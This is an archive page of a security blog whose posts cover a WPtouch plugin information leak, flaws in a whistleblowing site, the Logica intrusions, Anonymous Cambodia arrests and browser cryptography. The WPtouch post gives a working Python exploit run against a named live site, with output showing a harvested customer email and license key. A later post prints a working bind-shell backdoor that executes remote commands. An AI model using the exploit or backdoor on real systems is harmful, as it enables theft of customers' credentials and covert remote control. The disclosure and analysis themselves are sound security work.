Archive for the ‘Security’ Category

0day: Extracting WPtouch Mobile Plugin License Keys

Wednesday, September 24th, 2014

With 6,030,141 downloads the WPtouch Mobile Plugin is currently the 24th most popular WordPress plugin. The plugin offers “pro” functionality for which the users need to pay money. WPtouch suffers from information disclosure vulnerabilities, and today I’m going to demonstrate how to steal license keys. The vulnerabilities seem to affect most versions up until the current 3.4.10, I have not been bothered to test them all.

Having a quick peak at the pro functionality we can discover this beauty:

wptouch_add_pro_setting(
         'checkbox',
         'automatically_backup_settings',
         sprintf( __( 'Automatically backup settings to the %s folder', 'wptouch-pro' ),
         '<em>/wptouch-data/backups</em>' ),
         wptouchize_it( __( 'WPtouch Pro backups your settings each time they are saved.', 'wptouch-pro' ) ),
         WPTOUCH_SETTING_BASIC,
         '3.0'
),

Sounds like a good idea, right? Automatically backing things up, only a fool would mind that!

Let’s have a look at the wptouch_backup_settings() function located in core/admin-backup-restore.php:

$backup_string = base64_encode( gzcompress( serialize( $settings_to_save ), 9 ) );

$backup_base_name = 'wptouch-backup-' . date( 'Ymd-His') . '.txt';
$backup_file_name = WPTOUCH_BACKUP_DIRECTORY . '/' . $backup_base_name;
$backup_file = fopen( $backup_file_name, 'w+t' );
if ( $backup_file ) {
        fwrite( $backup_file, $backup_string );
        fclose( $backup_file );
}

What this tells us is that we can reverse the backup storing procedure and reading the contents of backup files by:

base64_decode(unserialize(gzuncompress(file_get_contents($backup_file_name))));

Naturally, that is more or less precisely what wptouch_restore_settings() does. wptouch_backup_settings() pretty much uses the same call to wptouch_get_settings() as anything else whenever a WPtouch setting needs to be read. It calls the get_settings(), the general method for loading settings, and returns them as expected.

When WPtouch is being configured it calls wptouch_create_directory_if_not_exist() for each directory required by the plugin to function. This is because the plugin relies on directories outside the traditional wp-content/plugins/ directory.

Namely, for backups, WPtouch creates either the wp-content/uploads/wptouch-data/ OR wp-content/wptouch-data/ hierarchy. (There appears to be some sort of difference between versions or installations, something that I have chosen not to dig very deeply into.) By default WordPress is shipped with an index.php file for preventing directory listing in the wp-content directory.

Yeah, you guessed it: WPtouch doesn’t protect the directory listing of its wptouch-data/backups/ directory. This leaves its often automatically created backups, named as ‘wptouch-backup-‘ . date( ‘Ymd-His’) . ‘.txt’, completely accessible to anybody that knows where to look. Although, the wptouch-data and wp-content directories may of course be renamed and being able to determine their paths is a given for this to work (dork inurl:”wptouch-data”).

When get_settings() is called by the backup routine it includes the plugin’s “BNCID” settings which, in turn, contains the customer’s configured e-mail address, license key and WordPress admin nonce. So I guess you could say that an undocumented pro function of WPtouch is to publicly share the pro user’s credentials so that nobody else needs to acquire them on their own. :-)

Proof of Concept

Hacking it all up targeting the least popular site I could find with my very low patience:

#!/usr/bin/env python2
import mechanize
import lxml.html
import phpserialize
import zlib
import base64

WP_CONTENT_URL = "http://holliava.com.au/wordpress/"
haystack = "wp-content/uploads/wptouch-data/backups/"

b = mechanize.Browser()
b.addheaders = [("User-Agent", "MAsTER hAs AWardEd mE yOuR wpTouCh lICeNSe KeY :PppPPppp")]
b.set_handle_robots(False)

url = WP_CONTENT_URL + haystack
print("[+] KnocKING: %s" % (url))

b.open(url)
r = b.response()
d = lxml.html.parse(r).getroot()
needles = [link.attrib.get("href") for link in d.xpath("//a")]

if len(needles) <= 1:
    raise Exception("[-] NO FILez such fAIl ")

print("[+] wOw mUcH fiLE")

for needle in needles:
    if "wptouch-backup-" in needle:
        url = WP_CONTENT_URL + haystack + needle
        d = b.open(url).read()
        objs = phpserialize.loads(zlib.decompress(base64.b64decode(d)), object_hook=phpserialize.phpobject)
        dict = objs[b"bncid"]._asdict()
        cust_email = dict[b"bncid"].decode("utf-8")
        license_key = dict[b"wptouch_license_key"].decode("utf-8")
        print("[+] %s: %s %s" % (needle, cust_email, license_key))

By running it we get (slightly censored):

$ ./sploit.py 
[+] KnocKING: http://holliava.com.au/wordpress/wp-content/uploads/wptouch-data/backups/
[+] wOw mUcH fiLE
[+] wptouch-backup-20131013-022334.txt: [email protected] acb7f-CENSORED-b25b0-a71a8

Possible fixes

  • Deny www access to the WPtouch backup directory and contained files
  • Optionally encrypt the WPtouch backup files with unique keys (per installation or by passphrase)
  • Optionally exclude critical information (is it really necessary for the plugin to backup the license key?)

TV-Leaks Is Broken and Dangerous

Thursday, September 18th, 2014

In 2013 SVT, Sveriges Television, launched its whistleblowing platform inspired by Wikileaks. TV-Leaks intends to make it easier for Swedish whistleblowers to leak sensitive information to journalists. The problem is that TV-Leaks suffers from a long list of vulnerabilities.

Unencrypted attachments

The form allows visitors to upload files. Even worse: if the encrypted message is too long users are recommended to send it as an attachment instead:

// Check that the lenght of the above is not too long
if ($('#encryptedMessage').val().length > 131072)
{
    alert("Meddelande-texten är för lång, prova med att skicka med en bilaga istället.");
    return false;
}

TV-Leaks does not encrypt attachments:

$('#encryptedMessage').val(openpgp.write_encrypted_message(pub_key, message));

Submitting the form with all fields set to “test” and attaching the file “test.txt” containing the string “test” POSTs the following:

-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="title"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="files[]"; filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="department"\r\n\r\nsvtnyheter\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="phone"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="email"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="encryptedMessage"\r\n\r\n-----BEGIN PGP MESSAGE-----\r\nVersion: OpenPGP.js v.1.20130712\r\nComment: http://openpgpjs.org\r\n\r\nwcBMA9CgkCCRTSS6AQgAgBc3+aFzhuX9d5tqgKmdP7bbsj/HCZgu7Je1qMMs\r\nvefcPPE8gJfpT2zPB023dG11msmbp+3PUXV4qWPYJiwe0CqjshQR6JpdubB7\r\nmP6qrKPiTlOFxaR5E5PTlr0pfdBch6MblCCngQEUVDCcfTIBWnG/4khb+day\r\n8Dd3x0AD8+PmP7EAS2tdv52nwfXc4oMTMhrNRLTBEo0K4osrfr+83WJ62OcN\r\npBkXIpq6MIwPbmeh6HEm6jfrgWmqgYNdOqpkxCF1dwW0f8mC2KKUkhEhbNSd\r\nrFAycEZSEt9rxNNhYRnH/DstM+s8Pf/AgU/mtkNYwSGn8qapvyTPEa/1eiOw\r\nEtJ7ATXj3qFOUuDzoKPkD5KiVmowYX18pcYMkp73ZWe6HBVPPFc9Ir0QGLg2\r\nR9S6IeFBRRnUueYhFCko5gZz5aGrZCGfZOwRQ0bCpRbMvnSEjBZS6JCZYGD2\r\nd9NuSY0qYwQsdGGNb14VFA01gbHQw+1YZvvoAEKY/StL1V6M\r\n=OigO\r\n-----END PGP MESSAGE-----\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="notEncryptedMessage"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="submitButton"\r\n\r\n\r\n-----------------------------17354154294744539562044116888--\r\n

Notice that the attached file is sent in plaintext:

filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n

Outdated and vulnerable OpenPGP.js

TV-Leaks uses OpenPGP.js.

this.versionstring="OpenPGP.js v.1.20130712";

This version is vulnerable to the findings in Cure53’s security audit of OpenPGP.js. Cleartext Messages Spoofing, EME-PKCS1-v1_5 padding uses Math.random(), Cleartext Message Spoofing in Armor Headers, EME-PKCS1-v1_5 Error Handling in RSA Decryption, Errors in EMSA-PKCS1-v1_5 decoding routineErrors in EMSA-PKCS1-v1_5 decoding routine and Side-channel leak in RSA decryption, just to mention the most serious issues.

The pubkey

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFJgF40BCACo55jBfaiPg9L8YdFTurB1INum85ia/MP2WsCYaPShltM0qKS/
2UNmv/bXp0Nq7SgYvrs4xYRM2A71AONdXnyzMz7zCB5H3i/U3qF7D0eMMyQAhCPK
bMEXxpo96bOhlWyHnjPFVvXUwS/w1xDNRVrYetc9vAPM1kIOOcuABY8LpHLviVTZ
m+RIQ7akOhUmGekdo4vHGAlPJjOE0hJUh34ZG79Vp9vVDMd6O+CAZQMhO/dpp7zg
Y6TsL37q44vX6dyJuRLqPjvWfQLjJXDii/6LHz1+S+ETDC1RXtkJOCOkuvAl7S+T
/Bmu+nrEHDW5KvvlmfS5L8F7hTnVcwYtozkHABEBAAG0AIkBHAQQAQIABgUCUmAX
jQAKCRDQoJAgkU0kul56B/oCDRFETr9GFOi0ur6hsRfzJ9pD6FL+2ZcDFudPLlxH
pG80wbJf6SRkC6xK6KCrph6NBaE4FFMIXtO9fVX9nqrmCENwynv8Um+epXLDZUNU
J9YBzwnQ4l9+KDJ5lpIC0LrzHrZmUvg0/zeqOM9k5fLnHZTGQKSSX7vrEKwi/V49
TerDrPot2uNw+fs7rSyD17egCqIMK/0HVQcR4/IF/W1GWor8MxGnn7J57y+5fBN7
4AlT8TLEpmH4eZdwikUwgIBb9MPVId1v5RRBtf/gA0J5BBZvzFpe8f+ai+Qg6AYS
kbxcu3GCCDepEPj6NMxUeuIMM3Nzt2RMjsmR5x2KJf36
=CwA4
-----END PGP PUBLIC KEY BLOCK-----

The public key was generated using dodgy BouncyCastle Java crypto library v1.6.1.0. The public key should be replaced by a key generated by something properly functional and well-tested: GnuPG.

2048 bit keys should be considered as a replacement for the current 1024 bit. NIST has disallowed the use of 1024 bit keys after 31 December 2013 because they are insecure. 1024 bit RSA, which TV-Leaks uses, is broken.

Classical JavaScript verification issue

As usual, JavaScript crypto is a risk by nature since there’s no way for the client to verify that the file sent by the server is the expected file. Classic MITM risk with JavaScript crypto, not exclusive for TV-Leaks.

Is TV-Leaks safe to use?

Not at all.

Logica Infiltrated Multiple Times By Automated Tools

Monday, September 15th, 2014

Logica, later CGI, was on the list of hacked companies in what’s been called Sweden’s largest hacking case. In their report on the IT security incident of 2012 they wrote that perpertrators managed to get system access in the end of February 2012, believing 2012-02-25 to be the start date but that series of attack attempts were launched earlier.

On 26th August the Swedish Defence Force (Försvarsmakten), FRA (Swedish National Defence Radio Establishment), Swedish Police and Swedish Civil Contingencies Agency held a talk describing modern cyber threats during a conference on information security held by the Swedish government. The talk mentioned the breaches of Logica’s systems but more importantly it was said that Logica had been hacked months before the incidents involving the mainframe had occurred. The PDF containing the slides from the talk can be downloaded here with page 18 showing a screenshot of a mirrored defacement page.

“When the main investigation started, there were a lot of uncertainties on what parts were compromised or which potentially other systems were involved in the incident. Thus there have been a number of different side tracks during the main investigation.” – Logica security incident report page 28

One of those sidetracks involved a computer named SCAP0023 in Logica’s incident report. At this point it is worth to clarify that the PDF file of the incident report available on the Internet has been scanned from its physical copy and then digitalized. Some characters are incorrect in the PDF due to the OCR, for example “E” may have been incorrectly recognized as “C”. Quoting Wikileaks on the matter: “The material is formally public, but the Swedish prosecution authority has refused to provide the documents in digital format. Photocopying this volume of paper costs around £350.”

Inspired by the way that the Danish Police is able to conduct forensics analysis and securing evidence without even seeing the computers in question I set out to do the same thing. With a little black Internet magic I waded through the Internet Archive Wayback Machine and discovered 108 mirrored URLs for ux.logica.se – the same Logica domain which was hacked before the mainframe intrusions occurred.

“SCAP0023 Server hosting multiple web servers for many legacy companies in the Logica group, e.g. WM-Data.” – Logica security incident report page 22

For the sake of creating a somewhat easily viewable timeline, the Wayback Machine mirrored URLs in the following order:

May  16 2011 http://ux.logica.se:80/.?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=start
May  17 2011 http://ux.logica.se:80/index.php?page=we_are
May  17 2011 http://ux.logica.se:80/index.php?page=we_do
July 17 2011 http://ux.logica.se:80/index.php?page=contact

One month later, on August 23 2011, Zone-H created the mirror of the defacement page which was included in the talk at the yearly information security conference held by the Swedish government. The ux.logica.se domain had been defaced by ir4dex.

Suddenly the Wayback Machine picked up some interesting paths:

February 15 2012 http://ux.logica.se:80/tmp/cases/case7.php
February 16 2012 http://ux.logica.se:80/tmp/cases/?act=ls&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp&sort=0a
February 17 2012 http://ux.logica.se:80/tmp/cases/
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=about
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=chmod&f=c999sh_backconn.278.c&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp%5Ccases
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=selfremove

Half a year after ir4dex defaced ux.logica.se the Wayback Machine was crawling malicious files on Logica’s server: the C99 and Fx29 PHP shells, two popular tools used as as part of automatic website penetration. Not only had Logica been defaced, the Wayback Machine was indexing backdoors six months later.

logica_web_shell

A cached version of the Fx29 shell reveals a server containing four drives: A:\, C:\, D:\ and E:\. E:\ contained the web root directory, more specifically E:\Inetpub\wwwroot\ux.logica.se\, with 5.31/15 GB disk usage. It was running Microsoft IIS 6.0 and PHP 5.2.9 on Windows NT SE-AP0023 5.2 build 3790 as user IUSR_SE-AP0023.

SE-AP0023 sounds like something that would have been incorrectly read as SCAP0023 during the digitalization of Logica’s security incident report. The server was investigated as a side track. Unfortunately Logica wrote very little about its investigation of this server:

“Appendix Y: SCAP0023/www.wmdata.* investigative side track
The SCAP0023 server is a server hosting web pages for Logica, not their customers. The web pages and the domains associated with that system is to host a legacy web for one of the previous company names and companies that make up the current Logica company. The old company was name “WMData”.

The incident involving SCAP0023 was related to defaced web pages, e.g. unauthorized and maliciously changed web pages.

The detailed info from this incident is based on performing analysis of the disk.

SCAP0023 is a Windows server system running IIS.

The defacement was added on multiple web sites hosted by the SCAP0023 server on August 2011, thus many months before the (current) incident involving the mainframe.

A forensic investigation was initiated on the disks that have been part of the system. The investigation showed that the defacements were performed with automated tools. And that the system were attacked and infiltrated multiple times.” – Logica security incident report page 534

The given description fits perfectly with the hacked SE-AP0023 found through the Wayback Machine. By reading the cached versions of the PHP shell we can extract some more interesting details, the files related to the hack:

February 13 2012 12:42:39 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\
February 13 2012 13:18:24 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.278.c
February 13 2012 13:19:01 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.756.pl
February 13 2012 13:38:17 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\case7.php
February 13 2012 14:40:43 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\nc.exe
February 25 2012 15:42:13 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\attack(1).asp
February 26 2012 07:04:51 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\11.aspx
March    19 2012 05:01:46 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\sa.php

Logica wrote in its report that it believes 25th February 2012 to be the first day of relevant attacks. You should notice that this was the first day that somebody uploaded a file with an ASP file extension: ”attack(1).asp”. However, even before this day, the server had been defaced and backdoored for even longer and the only action that Logica took was to remove the defacement page, leaving both vulnerabilities and backdoors in production.

It appears that all intrusions against this webserver occurred through the same vulnerability which enabled attackers to write to the .\tmp\cases\ directory, which in the Wayback Machine’s latest crawl of the PHP shell was listed as both readable and writable for the user serving the web content.

Anonymous Cambodia: The OPSEC disaster

Tuesday, June 17th, 2014

Pol-22-April-2014-09-18-17-47516

On the 30th August, 2012, a group of police officers met outside a local minimart near Riverside in Phnom Penh, Cambodia. Their mission was to raid and arrest anakata in his apartment located nearby as requested by Swedish authorities.

A group of hacktivists that calls itself NullCrew was quick to revenge carrying out attacks under the suitably chosen name: “Operation TPB”. On the 2nd September, 2012, they began leaking documents, usernames and passwords from Cambodian computer systems. They attacked the Cambodian Ministry of Public Works, the Institute of Standards, the general taxation department and the military. NullCrew’s attacks hit the local media and this is where the story about Anonymous Cambodia begins.

Most likely inspired by the press coverage of NullCrew’s attacks the Cambodian branch of Anonymous was formed. They adopted NullCrew’s OpTPB and on 12th September, 2012, the day after anakata landed in Sweden, it was reported that Anonymous Cambodia had broken into and leaked sensitive data extracted from the Cambodian Ministry of Foreign Affairs and defaced its website calling for anakata’s release.

The Cambodian branch went silent for a while only to wake up ready for the national elections held in July, 2013. They began defacing sites to spread their political message and DDoSing those that they could not deface accusing the ruling party of electoral fraud. Their mission was to topple the government lead by the Cambodian People’s Party which has ruled the country with an iron fist since the fall of Pol Pot and the Khmer Rouge regime.

“Because he has no formal training and uses programming scripts created by others, he said that he is a ‘script kiddie’ and not a true hacker.”

Less than two weeks before the election Anonymous Cambodia made their grand mistake. They participated in an interview with The Phnom Penh Post in which one of their members, “Black Cyber”, revealed personal information about himself and his agenda. In an interview with The Cambodia Daily he relied on “blacked-out webcam and computer software to distort his voice for fear that the call would be intercepted by U.S. intelligence agencies”.

Black Cyber was portrayed as a twenty-something IT security consultant who had become involved in Anonymous by participating in Operation Payback targeting pro-copyright, anti-piracy organizations and payment processors which had withdrawn banking facilities from WikiLeaks, similar to the attacks which would later be carried out as revenge for the arrest of The Pirate Bay founder anakata. Black Cyber denied involvement in OpTPB.

The interview given by Black Cyber provided excellent profiling data for law enforcement agencies. He revealed the size of Anonymous Cambodia and claimed that three people had participated in attacks against the National Election Committee. Jao Kamsot, another individual who was interviewed for the article, said that he is a script kiddie and not a true hacker.

“I don’t think their group has many people, and we will wipe it out.”

Immediately after the interview given by Black Cyber the Cambodian Ministry of Interior Department of Security began collaborating with the United States’ FBI in an investigation against Anonymous Cambodia. On 7th April, 2014, 21 year old Bun Khing Mongkul Panha, known online as Black Cyber, was arrested together with 21 year old Chou Songheng, alias Zoro.

The pair was charged with cyber crimes conducted against 30 government websites including the National Election Committee, Ministry of Foreign Affairs, Ministry of Defense, Anti-Corruption Unit and Phnom Penh Municipality. They were charged with unauthorized access to an automated data processing system, obstructing the functioning of an automated data processing system and fraudulent introduction, deletion or modification of data. Black Cyber confessed immediately.

On 22nd April, 2014, an individual calling itself “Attacker Fiber” created a Facebook page named after the group vowing revenge and posting YouTube videos showing how to conduct DDoS attacks. He used the page to market his own page (Attacker-Fiber) on which he advertised “Website Security Learning to be Anonymous” [sic] including SQL injection, defacement and backdoor techniques for $100 per course. He also set up a site titled “Cambodia Security” advertising the same services and posting guides for trivial things such as XAMPP installation.

On 29th April 2014 Anonymous Cambodia claimed on its Facebook page that they had breached the site belonging to the Anti-Corruption Unit promising further attacks. Dim Chaoseng, the lawyer defending the members of Anonymous Cambodia arrested earlier, expressed his concerns saying: “All the activity that Anonymous is doing at the moment is not going to help my clients. It is going to get more difficult to release my clients on bail.”

“…he said using a blacked-out webcam and computer software to distort his voice for fear that the call would be intercepted by U.S. intelligence agencies.”

Only days after the claimed attacks against the Anti-Corruption Unit, on 1st May 2014, two additional (unnamed) members of Anonymous Cambodia were arrested and charged with disrupting the ACU using the moniker Game-Over-xX23xX.

Angered by the four arrests, on the 4th May 2014, the group attacked the Royal Gendarmerie, Ministry of National Defense and CamCERT (Cambodia Computer Emergency Response Team) demanding the release of their “comrades”. Military Police spokesman Kheng Tito was quoted saying: “I don’t think their group has many people, and we will wipe it out.”

On 4th June Attacker Fiber, a 17 year old boy named Chin Neangleangmeng, became the 5th arrested member of Anonymous Cambodia. He confessed immediately.

Since the arrest of Attacker Fiber the small but very cocky group has been very quiet online. Anonymous Cambodia is now held in Prey Sar Prison in Phnom Penh, which was built for 500 inmates but was reportedly the home of 3,000 inmates in 2011, and they will most likely stay there until the authorities figure out how to punish them as Cambodia is currently lacking many internationally common cybercrime laws to regulate hacking and DDoS attacks.

anakata’s uncontrollable computer

Thursday, September 5th, 2013

IT security specialists working for the Swedish Security Service Department of Information Security and Preservation of Evidence in IT environments performed forensics analysis on a computer seized from GSW and made the conclusion that it would be impossible to remotely control it without leaving traces, specifically seizure 2012-0201-BG25023-26. The problem is that they are wrong. The investigation report is originally written in Swedish, my translated version can be downloaded here.

The forensics analysis was isolated to the assumption that computers can only be remotely controlled via legit remote control services, such as Terminal Services and PowerShell. The forensics analysis focused on the services mentioned by the defendant and thus bypassed the possibility that, just like Nordea’s and Logica’s computers, the seized computer might as well just have been hacked unknowingly to the defendant; equal to how Logica was undetectably hacked for at least two years.

Yesterday, when Jacob Applebaum was heard as an expert witness called by the defense, the author of the report admitted that all contents of the seized computer’s harddrive had not been analyzed and that he is not a Windows expert.

The analysis assumes that only one firewall was present in the network: Windows Firewall, despite there being records of “plastic cover belonging to router” being handed over to Swedish authorities by Cambodian authorities. The router’s model version and firmware settings are uknown as it has neither been documented nor analyzed. Apparently seizing the plastic cover was a higher priority.

In their investigation the Security Service shows that Adobe Flash Player versions 11.0r1, 11.2.d202, 11.3.r300, 11.3.r400 and 11.3.402 had full permissions in the seized computer’s Windows Firewall rules to communiate over both TCP and UDP over any port in any direction. These versions of Adobe Flash Player are vulnerable to over 100 security issues which can be exploited to execute code through so called remote code execution exploits.

The computer’s Windows Firewall also allowed the Python interpreter to, just like all the other whitelisted applications, communicate over both TCP and UDP on any port and on any network device. Without going into further details in this post, here is a simple example of how a computer can be remotely controlled without leaving traces via Python:

import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM))
# Bind to port 9999 (example) on any network device
s.bind(("", 9999))
s.listen(1)
# Accept connections from clients
conn, addr = s.accept()

# Loop forever
while 1:
  # Read command sent from client
  data = conn.recv(1024)
  # Close link if no command is received
  if not data: break
  print("[+] Connection established")
  # Execute received command
  output = subprocess.check_output(data.decode().rstrip())
  # Send output of executed command back to the client
  conn.send("OUTPUT\n------\n".encode())
  conn.send(output)

conn.close()

When running the script above it creates a socket that listens on port 9999 which accepts connections on any network device on the computer. It then waits for clients to connect to it, reads received commands, executes them and returns the command output to the client. It’s not even complicated.

As an example this is what it looks like when a client connects to the server and lists the files in the current directory:

> telnet localhost 9999
Connected to localhost.
Escape character is '^]'.
ls
OUTPUT
------
server.py

In addition, the same scenario applies to another piece of software which was both installed and fully allowed in the local firewall: Neko.

Additionally the computer had both the OpenVPN client and server software installed enabling outsiders to connect to the computer and connecting the computer to additional networks, forming a Virtual Private Network, which is a globally routed virtual LAN. By directly connecting to the computer or by connecting the computer to an existing VPN other clients in the same VPN can share local resources, like harddrive storage, across the network.

Essentially it all boils down to that it is up to the software which enables remote control functionality to save logs to the harddrive. If the programmer doesn’t explicitly write such logging functionality, like in the Python example given above, logs are simply not stored to the disk. Windows does not write every network transmitted bit to the disk and unless someone logs their own backdooring it’s not going to be detected through forensics. Neither is the Python example demonstrated above detected by antivirus software as it is performing completely normal network operations.

You can obtain my somewhat lengthy comments written on this matter here. Please keep in mind that it was written under somewhat stressed circumstances where technological facts were more prioritized than human linguistic expression and spelling.

With more than 100 possibilities to remotely control the defendant’s computer without leaving traces, counting only those circumstances that paint the environmental picture in the Security Service’s investigation, it is absurd to claim that it would be impossible to remotely control the seized computer without leaving traces.

The authorities worked around the preresquites of justice when they first seized a router’s plastic cover instead of the router itself and later focused selectively on Windows Firewall. Analyzing the plastic cover would have had the same relevance as the investigation of remote control possibilities conducted by the Swedish Security Service.

Making the possible seem impossible is easy when the defendant’s documents are locked in a secret cabin and nobody has the ability to question you, but such actions does not promote true possibilities. It seems like the investigators were biased.

Solving the browser crypto problem

Sunday, July 14th, 2013

Many developers have worked hard to port critical cryptographic functionality to JavaScript. We all agree that there is a clear requirement in a safer world to have asymmetric crypto support in the web. Porting code to JavaScript is great for users that don’t really care about the strength but only that the data is encrypted. Those people usually believe that they do not need perfect crypto, as long as it is any form of crypto it is “good enough” for them.

There are many problems with porting cryptographic functions directly to JavaScript and we see many great ideas failing on doing things properly. JavaScript cryptography is very young when comparing its lifespan to established binary solutions, such as GnuPG, that have been audited for long. GnuPG has been around since 1999 and GPG4Browsers, now OpenPGP.js, since 2011.

Auditing JavaScript ports leads to better design and less failures in time, but even when everything has been solved some problems remain due to design. Web browsers live in a very hostile world and we systematically witness XSS vulnerabilities and 0day exploits which enable dumping critical data, like private keys, as soon as either the DOM or HTML5 local storage is accessed. We can take care of badly implemented cryptography but we can’t take care of the way that the JavaScript implemented cryptography is accessible to anything that can execute JavaScript in the correct environment. As long as cryptography is done in JavaScript this will always be a huge threat.

The users that care more about their security and privacy are demanding solutions aligned with their requirements, and JavaScript implemented cryptography is by design insecure due to the surrounding threats in its domain. These users are actively choosing not to use JavaScript ported functionality but instead continue to use their local binaries that have been around and audited for decenniums more than newborn ports. And they are completely correct in doing so, because how can we actually trust JavaScript? We are stepping over the security requirements in order to deliver working solutions faster than science can keep up with it. We are impatient and we need something to work as soon as possible, especially in modern day and age with the ongoing war against free unmonitored online communication. By doing so we bypass the most important core ideas of implemented cryptography: security and privacy.

The solution

In order to expose GnuPG functionality to the web we must create an API for it which can perform cryptographic operations with non sensitive elements, such as armored public keys and private key metadata, without exposing anything of importance. The best way of doing it and successfully integrating it into web browsers is to run a webserver locally which pre accepted remotely served content can communicate with. The most important detail is that private keys should never ever be available for the web browser but instead reside in the local GnuPG keyring which the API manipulates through the local GnuPG binary.

I came up with a solution that I named pygpghttpd which I am currently working on supporting in my OpenPGP plugin for Roundcube: rc_openpgpjs. pygpghttpd is an open source minimalistic HTTPS server written in Python. pygpghttpd exposes an API enabling GnuPG’s cryptographic functionality to be used in web browsers and other software which allows HTTP requests. pygpghttpd runs on the client’s localhost and allows calling GnuPG binaries from the user’s browser securely without exposing cryptograhically sensitive data to hostile environments. pygpghttpd bridges the required elements of GnuPG to HTTP allowing its cryptographic functionality to be called without the need to trust JavaScript based PGP/GPG ports. As pygpghttpd calls local GnuPG binaries it is also using local keyrings and relying on it entirely for strength. In short pygpghttpd is just a dummy task router between browser and GnuPG binary.

pygpghttpd acts as a HTTPS server listening on port 11337 for POST requests containing operation commands and parameters to execute. When a request is received it checks the “Origin”, or if missing the “Referer”, HTTP header to find out which domain served the content that is contacting it. It then detects if the domain is added to the “accepted_domains.txt” file by the user to ensure that it is only operational for pre accepted domains. If the referring domain is accepted it treats the request and serves the result from the local GnuPG binary to the client. In the response a Cross-origin resource sharing HTTP header is sent to inform the user’s browser that the request should be permitted. If the referring domain is missing from accepted_domains.txt the user’s browser forbids the request in accordance with the same origin security policy.

The HTTPS certificate used by pygpghttpd is self signed and is not used with the intention to enhance security since all traffic is isolated to the local network interface. It uses HTTPS to ensure that both HTTPS and HTTP delivered content can interact with it.

pygpghttpd exposes metadata for both private and public keys but only allows public keys to be exported from the local keyring. The metadata for private keys is enough for performing cryptographic actions. Complete keypairs can be generated and imported into the local keyring.

For example, generating a keypair with cURL:

curl -k –data “cmd=keygen&type=RSA&length=2048&name=Alice&[email protected]&passphrase=foobar” -H “Origin: https://accepted.domain.com” https://localhost:11337/

Or from JavaScript:

$.post("https://localhost:11337/", {
  cmd: "keygen",
  type: "RSA",
  length: "2048",
  name: "Alice",
  email: "alice\@foo.com",
  passphrase: "foobar"
}, function(data) {
  if(data == "1")
    return true;
  return false;
});

Please see the project on Github, API documentation and example for full details.

Everything important to Sweden is hacked

Saturday, April 27th, 2013

“The case is of Swedish national interest due to the very extensive character of the intrusion. The preliminary investigation involves Swedish authorities such as the Swedish Prosecution Authority, the National Bureau of Investigation (Police), the Stockholm Regional Investigation Unit (Police) and the Swedish Security Service (Security Police). […] The accessed data may cause considerable damage to authorities, companies and individuals. The intrusion handled by the on-going criminal investigation is probably the most serious suffered by Swedish IT-systems linked to public authorities. […] The analysis of the intruded mainframe computer makes it evident that an IP-number connected to Cambodian Internet Service Providers/Hosting Services have been used for part of the criminal intrusions, including extensive copying of sensitive data from the mainframe computer.”

This writing covers the Swedish government’s legal aid request which you can read in PDF format here.

The Swedish government’s request for legal assistance again proves that the kidnapping had nothing to do with TPB. The trial conviction was a cheap flag for Interpol to wave so that the Cambodian authorities would act, unlike how they usually go “meh” over internationally wanted pedophiles and murderers hiding in the region.

4th October, while the prosecution spokesperson told the media that this circus was due to TPB, Cyrus Farivar wrote in an article published by Ars Technica: Femerstrand also accused the Swedish Security Service of conducting surveillance of Svartholm Warg in Cambodia, “since [at least] March 2012.” (The Swedish Security Service did not reply to our request for comment.) How did I know? They were checking me out too. They visited me in restaurants and documented what I was eating, they photographed the house that I lived in and they filmed me taking out my garbage. Spotting agents is sometimes easy, and probably much easier in Phnom Penh; they don’t blend in. They must’ve sent rookies to Cambodia, I mean we’re talking Hawaii shirts, straw hats and sunglasses. Reading about myself in the intel on Gottfrid as “one or more Swedish hacktivist in Cambodia ” confirms my previous suspicions that they did their homework about me.

Evidence in the case has been gathered from equipment seized from the suspects’ possessions, Pastebin, Ubuntu One, Passagen and IRC (primarily EFNet). Two computers seized from one of the suspects were, according to the lawsuit, encrypted and could not be analyzed by forensics personnel. A few individuals living in Sweden have been visited by Swedish Police agents and had equipment seized and forced to sit in hearings with IT forensics staff simply for having online contact with suspects in the case. Several friends who had IRC contact with Gottfrid have noticed hacking attempts on their machines that were traced back to Swedish police agencies. It appears safe to claim that the current police tactic is to throw rocks in the water to observe which rings form.

The Swedish government’s panic request for legal assistance claims that the alleged data breaches, when added together, is historically the most dangerous one targeting the Swedish government – ever. Interestingly enough the media hasn’t dared mentioning it despite it being said in the lawsuit that the machines that were used by the attackers to hack the Swedish Nordea bank (which spent over 10 billion SEK on their secure systems) were in fact owned by the Swedish Parliamentary Administration and the Swedish National Police, which is supposedly also entirely hacked. What should be more interesting to discuss than how somebody allegedly tries to increase some integers in database row columns is how somebody allegedly gained full control of a country’s most important infrastructural parts and not be noticed for two years.

